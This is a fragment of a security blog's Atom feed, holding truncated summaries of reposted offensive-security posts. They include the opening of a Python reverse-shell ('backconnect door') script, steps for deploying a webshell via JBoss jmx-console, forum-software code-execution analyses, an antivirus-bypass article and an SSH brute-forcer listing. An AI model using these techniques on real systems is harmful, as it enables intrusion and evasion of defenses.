src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-9052745601144090344</id><published>2010-01-15T15:23:00.001+08:00</published><updated>2010-01-15T15:23:10.101+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='downloader'/><category scheme='http://www.blogger.com/atom/ns#' term='hta'/><title type='text'>做一個困難重重的hta下載者</title><summary type='text'>作者：lcx  一、先說本blog上有兩個比較新穎的vbs下載者，一個是利用CDO.Message組件做的，參見http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html；另一個是用Microsoft.XMLDOM做的，參見http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html。這兩個下載者一個是利用起來比較麻煩，需要事先把exe進行轉化。第二使用中cscript.exe會訪問網路，不太隱蔽。第二個是有的機器上並不存在這兩個組件及利用到ADODB.Stream的，所以有些弊端。  二、再來說一下lake2的下載者http://blog.csdn.net/lake2/archive/2007/05/08/1600580.</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9052745601144090344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9052745601144090344'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/hta.html' title='做一個困難重重的hta下載者'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3570158383208601054</id><published>2010-01-15T15:22:00.001+08:00</published><updated>2010-01-15T15:22:00.392+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FreeBSD'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>FreeBSD local r00t zeroday</title><summary type='text'>** FreeBSD local r00t 0day    Discovered &amp; Exploited by Nikolaos Rangos also known as Kingcope.    Nov 2009 "BiG TiME"  "Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg  There is an unbelievable simple local r00t bug in recent FreeBSD versions.   I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.  The bug resides in the Run-Time Link-Editor (</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3570158383208601054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3570158383208601054'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/freebsd-local-r00t-zeroday.html' title='FreeBSD local r00t zeroday'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7717361472463661683</id><published>2010-01-15T15:20:00.001+08:00</published><updated>2010-01-15T15:20:18.944+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ssh'/><title type='text'>Password brute forcer for SSH.</title><summary type='text'>Features:  · Multi threaded  · Supports both SSH v1 and v2 protocols  · Supports key based brute forcing  · Support for post brute force exploration  · Mass mode to run one command across all targets  · Support for sudo based privilege escalation  · Integrated file transfer support  SSHatter-1.0.tar.gz    MD5: 74FBC2170FAD60BD868F08BCD41BF4C9    SHA1:386B2FCD0467FB27174F2EBC9BB570BF534295EE  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7717361472463661683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7717361472463661683'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/password-brute-forcer-for-ssh.html' title='Password brute forcer for SSH.'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5281520836143098795</id><published>2010-01-15T15:18:00.001+08:00</published><updated>2010-01-15T15:18:57.763+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><category scheme='http://www.blogger.com/atom/ns#' term='python'/><title type='text'>python backconnect door</title><summary type='text'>來源：影子  小雨寫的一個，替代之前的perl版本的，可以直接返回ttyshell   返回的shell可以直接ssh，su等操作  #!/usr/bin/python  import sys  import os  import socket  import pty  shell = "/bin/sh"  def usage(programname):  print "ython connect-back door"  print "Usage: %s &lt;conn_back_ip&gt; &lt;port&gt;" % programname  def main():  if len(sys.argv) !=3:  usage(sys.argv[0])  sys.exit(1)  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  try:  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5281520836143098795'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5281520836143098795'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/python-backconnect-door.html' title='python backconnect door'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7128190230182813720</id><published>2010-01-15T15:16:00.001+08:00</published><updated>2010-01-15T15:16:44.446+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Spoofing'/><title type='text'>重談IP欺騙技術</title><summary type='text'>By papaya  閱讀這篇文章之前請先瞭解一TCP/IP的基本結構和工作原理，最好在複習一下ip spoof常見技術，這將有助於你更容易的理解本文。  還是先簡單回顧一下吧， IP spoof即IP 電子欺騙，我們可以說是一台主機設備冒充另外一台主機的IP位址，與其它設備通信，從而達到某種目的技術。那麼該如何實現呢？很多的掃描器支援偽造源IP位址進行埠掃描，這種方法是非常容易進行的，只需要構造單一的SYN包探測就完成了。難的是如何整個會話中進行IP位址偽造，  例如如何讓自己成為被信任的主機去登錄一台終端伺服器，甚至接管已經有的會話關係。為了解決這個問題我們可以按照由易到難的思路去實現，既然已經可以構造單一的SYN包那仍然可以構造第二個ACK包,AP包….等所有的應用包。理論上完全可行，但是這可是非常大的工作量。相當於用pcap完全自己實現IP/TCP/應用層協定，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7128190230182813720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7128190230182813720'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/ip.html' title='重談IP欺騙技術'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_q2SxxmLWIiM/S1AWW2BfQxI/AAAAAAAABIo/buOnidcJ_bw/s72-c/clip_image001_thumb.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-313832848932038407</id><published>2010-01-15T15:15:00.001+08:00</published><updated>2010-01-15T15:15:24.167+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ddos'/><category scheme='http://www.blogger.com/atom/ns#' term='fuzzy'/><title type='text'>Fuzz用戶端存儲物件，尋找client ddos</title><summary type='text'>By woyigui  目錄：  一、前言   二、發現漏洞    三、漏洞利用    四、環境影響    五、漏洞原因    六、後記    七、參考  一、前言  前一段墨西哥同學發現了一個關於http request header過長造成的一個server limit dos，  他那個是對cookie 寫入一個超長的資料造成的。那麼，我們可以根據此方法形成新的利用方法，Fuzzer   http頭部進行攻擊。只要造成WEB伺服器返回40X 錯誤就行了。比如，向http的GET 頭部資訊的URL值設置    特殊的符號，伺服器就會返回錯誤：  GET /settings.aspx%22 HTTP/1.1 //此處  Host: cn.bing.com  User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.1.5)</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/313832848932038407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/313832848932038407'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/fuzzclient-ddos.html' title='Fuzz用戶端存儲物件，尋找client ddos'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4776160392231616257</id><published>2010-01-15T15:13:00.001+08:00</published><updated>2010-01-15T15:13:44.412+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webkit'/><title type='text'>應用軟體缺陷利用的一點心得(Webkit篇)</title><summary type='text'>By wushi  眾所周知，在各軟體廠商高度重視軟體安全的當前情況下，成功穩定的利用軟體的缺陷進行娛樂是一件越來越困難的事情。  從這篇文章(http://blogs.technet.com/srd/archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx)   我們可以看到，"邪惡帝國"對於軟體的保護，設置缺陷利用的障礙已經是"令人髮指"，無所不用其計。在後XP時代，想要攻擊採用系統記憶體管理的軟體幾乎是不可能的事情。但是所幸的是，很多軟體廠商出於種種原因，很重要的一個原因是出於對不同平臺移植性的考慮，沒有採用windows的系統記憶體管理。    這裡一個重要的例子就是MS office,它為了在MAC OS下可以方便移植，也沒有採用windows</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4776160392231616257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4776160392231616257'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/webkit.html' title='應用軟體缺陷利用的一點心得(Webkit篇)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-796618162333474931</id><published>2010-01-15T15:12:00.001+08:00</published><updated>2010-01-15T15:12:06.744+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bypass'/><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>Bypassing Linux kernel module version check</title><summary type='text'>By wzt  1、 為什麼要突破模組驗證   2、 內核是怎麼實現的    3、 怎樣去突破    4、 總結    5、 參考    6、 附錄  1、 為什麼要突破模組驗證   Linux內核版本很多，升級很快，2個小內核版本中內核函數的定義可能都不一樣，為了確保不一致的驅動程式導致kernel oops，    開發者加入了模組驗證機制。它在載入內核模組的時候對模組進行校驗， 如果模組與主機的一些環境不一致，就會載入不成功。    看下面一個例子，它簡單的輸出當期系統中的模組清單：  #include &lt;linux/kernel.h&gt;  #include &lt;linux/module.h&gt;  #include &lt;linux/init.h&gt;  #include &lt;linux/version.h&gt;  #include &lt;linux/string.h&gt;  #include &lt;linux/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/796618162333474931'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/796618162333474931'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/bypassing-linux-kernel-module-version.html' title='Bypassing Linux kernel module version check'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3869224978515111403</id><published>2010-01-15T15:09:00.001+08:00</published><updated>2010-01-15T15:09:18.751+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='kaspersky'/><title type='text'>卡巴虛擬機器啟發式查毒的繞過方法</title><summary type='text'>By dangdang  據我瞭解在卡巴7中就有虛擬啟發式查毒的功能。國內就有人在BLOG上發表了一篇如何突破卡巴7的虛擬機器啟發式查毒的文章[1]。卡巴8和最新的卡巴2010中仍然具有該功能。卡巴斯基不用我多說了，大家都知道。   我最近在網上查到有人說卡巴斯基是俄羅斯國家科學院合作開發的，軍方和克裡姆林宮專用。這個我還真的不清楚了，請原諒我的無知。我先來說下什麼是虛擬機器啟發式殺毒。  我認為在這裡的虛擬機器啟發式殺毒應該可以理解為在虛擬機器中執行和啟發式殺毒。虛擬機器即構造一個虛擬執行環境或者說一個模擬的環境，將病毒等惡意程式碼在該模擬的環境中運行實現自己脫殼等等。該模擬的環境和使用者電腦的真實環境是隔離的。  舉個例子：現在的惡意程式碼都採用加殼為自己提供保護，尤其是一些已知病毒的變種。當採用虛擬機器執行技術加殼保護的惡意程式碼仍能被殺毒軟體檢測到，有能力的讀者可以自己實驗一下。</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3869224978515111403'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3869224978515111403'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/blog-post.html' title='卡巴虛擬機器啟發式查毒的繞過方法'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4062176551859938005</id><published>2010-01-15T14:53:00.001+08:00</published><updated>2010-01-15T14:53:42.731+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Discuz'/><title type='text'>Discuz! 7.1 &amp; 7.2 遠端代碼執行漏洞</title><summary type='text'>作者：oldjun  首先說一下，漏洞是t00ls核心群傳出去的，xhming 先去讀的，然後我後來讀的，讀出來的都是代碼執行，1月5日夜裡11點多鐘，在核心群的駭客們的要求下，xhming給了個poc，我給了個exp，確實 發現的是同一個問題。截止夜裡2點多種我下線，還只有t00ls核心群裡幾個人知道我給出的exp，可我怎麼也想不到，經過半天時間，exp就滿天飛了， 而且確實出自昨天我的那個版本。  不難想像，exp流傳的速度，A與B關係好，A發給B；B與C是好朋友，B發給C...總有人耐不住性子，洩露點風聲，於是就人手一份。最受不了的是，竟然有些SB在群裡拿來叫賣；實在不想說什麼，要叫賣什麼時候輪到你？人心不古，以後有的話還是自己藏著吧。  上午漏洞告訴了Saiy，DZ官方的補丁很快就出來了吧。  特別說明：產生漏洞的$scriptlang陣列在安裝外掛程式後已經初始化，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4062176551859938005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4062176551859938005'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/discuz-71-72.html' title='Discuz! 7.1 &amp;amp; 7.2 遠端代碼執行漏洞'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3157510049346662374</id><published>2010-01-15T14:52:00.001+08:00</published><updated>2010-01-15T14:52:21.872+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='技術文件'/><category scheme='http://www.blogger.com/atom/ns#' term='DoS'/><title type='text'>對某款國家級內容過濾系統Dos安全缺陷分析</title><summary type='text'>Author: jianxin [80sec]    EMail: jianxin#80sec.com    Site: http://www.80sec.com    Date: 2009-1-2    From: http://www.80sec.com/release/dos-with-XXX.txt  [ 目錄 ]  0x00 前言   0x01 know it，瞭解這款內容過濾系統    0x02 Hack it，對防火牆類ids的一些安全研究    0x03 後話    0x00 前言  最近在學習網路基礎知識，秉承Hack to learn的作風，想對學習做個總結就想到分析一些網路設備的安全問題來作為一次總結。相信對於某款國家級內容過濾系統大家都不陌生，也被稱為國家邊界防火牆，其本質上只是一款強大的入侵偵測系統，並且在某些行為發生時對網路攻擊進行即時的聯動阻斷。</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3157510049346662374'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3157510049346662374'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/dos.html' title='對某款國家級內容過濾系統Dos安全缺陷分析'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8795799744440863203</id><published>2010-01-15T14:49:00.001+08:00</published><updated>2010-01-15T14:49:44.666+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='JBOSS'/><title type='text'>JBOSS遠端代碼執行漏洞</title><summary type='text'>作者：safe3  JBOSS預設配置會有一個後臺漏洞，漏洞發生在jboss.deployment命名空間  中的addURL()函數,該函數可以遠端下載一個war壓縮包並解壓  訪問http://www.safe3.com.cn:8080/jmx-console/ 後臺，如下圖    下拉找到如下圖所示    點擊flavor=URL,type=DeploymentScanner進入    在輸入框中寫入war壓縮檔webshell的url位址，如上圖  點擊invoke執行介面獲得一個jsp的webshell，如下圖    臨時漏洞修補辦法：給jmx-console加上訪問密碼  1.在 ${jboss.server.home.dir}/deploy下麵找到jmx-console.war目錄編輯WEB-INF/web.xml文件 去掉 security-constraint 塊的注釋</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8795799744440863203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8795799744440863203'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/jboss.html' title='JBOSS遠端代碼執行漏洞'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/S1AP_VbKxLI/AAAAAAAABII/v-379-ACpdw/s72-c/clip_image002_thumb.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2859242979967839675</id><published>2010-01-15T14:48:00.001+08:00</published><updated>2010-01-15T14:48:01.634+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phpwind'/><title type='text'>phpwind 7.5 Multiple Include Vulnerabilities</title><summary type='text'>author: 80vul    team:http://www.80vul.com  一.api/class_base.php本地包含漏洞  1.描敘  api/class_base.php檔裡callback函數裡$mode變數沒有過濾導致任意包含本地檔,從而可以執行任意PHP命令.  2. 具體分析  api/class_base.php文件裡:  function callback($mode, $method, $params) {  if (!isset($this-&gt;classdb[$mode])) {  if (!file_exists(R_P.'api/class_' . $mode . '.php')) {  return new ErrorMsg(API_MODE_NOT_EXISTS, "Class($mode) Not Exists");  }  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2859242979967839675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2859242979967839675'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/phpwind-75-multiple-include.html' title='phpwind 7.5 Multiple Include Vulnerabilities'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1303875752512778578</id><published>2010-01-15T14:46:00.001+08:00</published><updated>2010-01-15T14:46:26.885+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MyBB'/><title type='text'>MyBB 1.4 admin remote code execution vulnerability</title><summary type='text'>by flyh4t    team: http://www.80vul.com    date: 2010-01-10  測試版本MyBB 1.44.11  [一]漏洞分析  在index.php文件336行左右代碼如下：  //index.php,336行左右  $plugins-&gt;run_hooks("index_end");  //出現了eval函數，注意參數  eval("\$index = \"".$templates-&gt;get("index")."\";");  output_page($index);  看以下eval()函數中的內容是否可以控制，繼續找到templates類查看get函數的定義  //inc/class_templates.php,65行左右  function get($title, $eslashes=1, $htmlcomments=1)  {  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1303875752512778578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1303875752512778578'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/mybb-14-admin-remote-code-execution.html' title='MyBB 1.4 admin remote code execution vulnerability'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8831124754495774711</id><published>2010-01-11T13:55:00.001+08:00</published><updated>2010-01-11T13:55:05.296+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows 7 loader'/><title type='text'>Windows 7 Loader reboot</title><summary type='text'>當過BIOS畫面後就是重覆reboot   此時放入Windows 7的安裝片    開機後選擇修復，在命令列輸入    Bootrec /FIXBOOT    Bootrec /FIXMBR      </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8831124754495774711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8831124754495774711'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/windows-7-loader-reboot.html' title='Windows 7 Loader reboot'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1116567982027985922</id><published>2009-12-15T15:17:00.001+08:00</published><updated>2009-12-15T16:00:16.030+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='好書推薦'/><title type='text'>The Web Application Hackers Handbook Discovering and Exploiting Security Flaws book review and download</title><summary type='text'>  Description ,review and table of contents ofThe Web Application Hackers Handbook Discovering and Exploiting Security Flaws : This book is a practical guide to discovering and exploiting security flaws in web applications. By “web application” we mean an application that is accessed by using a web browser to communicate with a web server. We examine a wide variety of different technologies, such</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1116567982027985922'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1116567982027985922'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/12/web-application-hackers-handbook.html' title='The Web Application Hackers Handbook Discovering and Exploiting Security Flaws book review and download'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh3.ggpht.com/_q2SxxmLWIiM/Syc4I_hcyGI/AAAAAAAABIA/8apYDUvnFQA/s72-c/clip_image001%5B4%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8198305598183833776</id><published>2009-12-08T22:50:00.001+08:00</published><updated>2009-12-08T22:50:14.359+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PDoS'/><category scheme='http://www.blogger.com/atom/ns#' term='大大茶樓'/><title type='text'>現實中的PDoS</title><summary type='text'>DoS拒絕服務我想大家應該不陌生，但什麼是PDoS呢?  說穿了很簡單就是PhysicalDoS啦~  什麼，還不懂嗎?看一下圖吧!!  [台南德安百貨-大大茶樓]      如果請街上的遊民都到這家茶樓，每位發300元餐卷佔住一張桌子坐一整天，這樣這家茶樓也不用開了，這就是實體拒絕服務攻擊PDoS的威力啊!!     圖片引用自蘋果日報  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8198305598183833776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8198305598183833776'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/12/pdos.html' title='現實中的PDoS'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh5.ggpht.com/_q2SxxmLWIiM/Sx5nnfQlYQI/AAAAAAAABHk/cDecDl_udIs/s72-c/LN01_001_thumb%5B1%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8668126992254384382</id><published>2009-12-07T12:34:00.001+08:00</published><updated>2009-12-07T12:35:31.094+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='base64'/><title type='text'>base64 to file</title><summary type='text'>比賽時四處找工具,不如自己寫工具較快..  base642file .net framework  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8668126992254384382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8668126992254384382'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/12/base64-to-file.html' title='base64 to file'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3065640828534936404</id><published>2009-12-07T10:56:00.001+08:00</published><updated>2009-12-07T10:56:47.585+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='brianfuck'/><title type='text'>brianfuck example</title><summary type='text'>Hello World!  The following program prints "Hello World!" and a newline to the screen:  +++ +++ +++ +           initialize counter (cell #0) to 10[                       use loop to set the next four cells to 70/100/30/10    &gt; +++ +++ +             add  7 to cell #1    &gt; +++ +++ +++ +         add 10 to cell #2     &gt; +++                   add  3 to cell #3    &gt; +                     add  1 to cell</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3065640828534936404'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3065640828534936404'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2009/12/brianfuck-example.html' title='brianfuck example'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-866558502704994127</id><published>2009-12-01T16:56:00.001+08:00</published><updated>2009-12-02T15:15:44.638+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='櫻桃小丸子'/><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><category scheme='http://www.blogger.com/atom/ns#' term='小桃'/><title type='text'>發現重大弱點後的反省</title><summary 